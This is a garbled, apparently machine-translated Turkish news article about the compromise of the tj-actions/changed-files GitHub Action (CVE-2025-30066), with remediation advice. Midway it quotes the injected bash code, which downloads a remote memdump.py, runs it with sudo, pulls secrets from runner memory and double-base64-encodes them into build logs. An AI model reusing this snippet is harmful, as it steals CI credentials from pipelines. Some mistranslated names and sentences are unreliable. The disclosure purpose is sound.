CI/CD boru hatları (sürekli entegrasyon/sürekli teslimat) için güvenlik konusunda uzmanlaşmış StepusCrity Company, GitHub eylemleri için TJ aksiyon açık kaynak araçlarına/düzenleme dosyalarına bir saldırı keşfetti. Yabancılar, bir kayıt dosyasındaki projeden AWS tuşları, GitHub Access (kişisel erişim, PAT) ve özel RSA anahtarı gibi hassas bilgileri sağlayan aracı gizlice tanıttılar.
CVE girişi (güvenlik açığı ve ortak sergiler) CVE-2025-30066, 8.6 puanla yüksek olarak sınıflandırılır. Geçiş, 14 Mart'taki saldırıyı keşfetti. TJ-Actions/Modifiye Mainners şimdi Malizia kodunu projeden çıkardı. Bununla birlikte, inşaat kayıtlarının kamu Github depolarında hassas bilgilerle görüntülenme riski hala vardır.
Python'un senaryosundan sapma
Değiştirilmiş TJ/dosyaları GitHub eylemleriyle iş akışına entegre edilebilir. Dosyaların değiştirildiği CI/CD işlemindeki iz.
Görünüşe göre, saldırganlar @tj-acters-bot'a kişisel erişim belirteci yoluyla depoya erişim elde ettiler. Depodaki soruna göre, PAT'ın nasıl tehlikeye atıldığını anlayamazsınız. Github şimdi jetonu geri çekti. Projenin madencileri, gelecekteki saldırılara karşı koruma olarak şifreyi değiştirdi ve passkey kimlik doğrulamasını etkinleştirdi.
Saldırı için, Base64 tarafından kodlanan kodun bir bölümü, başlangıçta depoya indi ve Python tarafından bir komut dosyasını bir gözlükten kodladı:
if [[ "$OSTYPE" == "linux-gnu" ]]; then
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '�' | grep -aoE '"[^"]+":{"value":"[^"]*","isSecret":true}' | sort -u | base64 -w 0 | base64 -w 0`
echo $B64_BLOB
else
exit 0
fiPython MemnDump.py betiği nihayet sırları arar ve bunları sicile ayırır. Güvenlik araçları bilgiyi hassas bilgiler olarak tanımlamaz ve otomatik olarak filtrelenmez, komut dosyası Base64 ile bilgiyi iki katına çıkarır.
Tehlikedeki kamuoyu yeniden konumlandırmaları
Madenciler şimdi projenin kötü kodunu proje tarafından kaldırmış olsa da ve Malizia kodu olan özü artık mevcut olmasa da, kamu depoları için saldırganların derleme kayıtlarını görüntüleyebileceği ve hassas bilgileri kodlayabilme riski var.
Github eyleminin yürütülmesinde aracı kullanan herkes, şüpheli içerik için derleme kayıtlarını kesinlikle kontrol etmelidir. Kayıtlarda çift baz64'te kodlanmış bölümler varsa, yalnızca dosyaları kaldırmak değil, aynı zamanda ilgili sırları da değiştirmek gerekir.
Python Script kodu dahil olmak üzere daha fazla ayrıntı Stepuscripty'deki blog yayınında bulunabilir.
(RME)
Bir yanıt yazın